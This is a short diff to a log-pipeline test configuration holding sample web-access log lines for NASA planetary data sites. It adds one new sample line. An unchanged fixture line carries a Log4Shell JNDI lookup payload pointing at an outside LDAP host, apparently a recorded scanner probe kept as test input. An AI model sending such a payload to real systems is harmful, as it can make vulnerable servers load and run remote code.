--- a/tests/config/test-input-https.conf
+++ b/tests/config/test-input-https.conf
@@ -79,8 +79,8 @@ input {
       '207.151.104.172 ${jndi:ldap://207.151.104.172:57904/nessus} - [30/Aug/2024:08:04:26 -0700] "GET / HTTP/1.1" 301 169 "http://planetarydata.jpl.nasa.gov/" "${jndi:ldap://207.151.104.172:57904/nessus}"',
 
       # GEO Test Cases
-      '65.108.2.73 - - [12/Dec/2024:06:00:03 -0800] "GET /speclib/urn-nasa-pds-relab/data_reflectance/ftir1/1101s549.xml HTTP/1.1" 200 9797 "https://pds-geosciences.wustl.edu/speclib/urn-nasa-pds-relab/data_reflectance/ftir1/" "Mozilla/5.0+(compatible;+SeekportBot;++https://bot.seekport.com)"'
-
+      '65.108.2.73 - - [12/Dec/2024:06:00:03 -0800] "GET /speclib/urn-nasa-pds-relab/data_reflectance/ftir1/1101s549.xml HTTP/1.1" 200 9797 "https://pds-geosciences.wustl.edu/speclib/urn-nasa-pds-relab/data_reflectance/ftir1/" "Mozilla/5.0+(compatible;+SeekportBot;++https://bot.seekport.com)"',
+      '20.171.207.25 - - [02/Mar/2025:01:33:15 -0800] "GET /moon/indexproductpage.aspx HTTP/1.1"'
     ]
     # Add fields at input stage
     add_field => {
